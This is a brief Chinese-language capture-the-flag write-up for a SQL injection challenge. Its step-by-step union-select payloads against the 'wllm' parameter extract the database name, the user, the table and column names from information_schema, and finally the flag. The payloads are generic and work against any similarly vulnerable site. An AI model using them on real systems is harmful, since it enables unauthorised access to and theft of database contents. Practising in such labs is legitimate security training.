参数为wllm
输入?wllm=1
试出字段
输入?wllm=100' union select 1,database(),3 -- asd
所以,库名:test_db
输入:?wllm=-1 ' union select 1, 2, user() -- '
/?wllm=-1 ' union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema='test_db'-- '
/?wllm=-1 ' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='test_tb' -- '
输入:/?wllm=-1 ' union select 1,2, group_concat(flag) from test_tb -- '
得到flag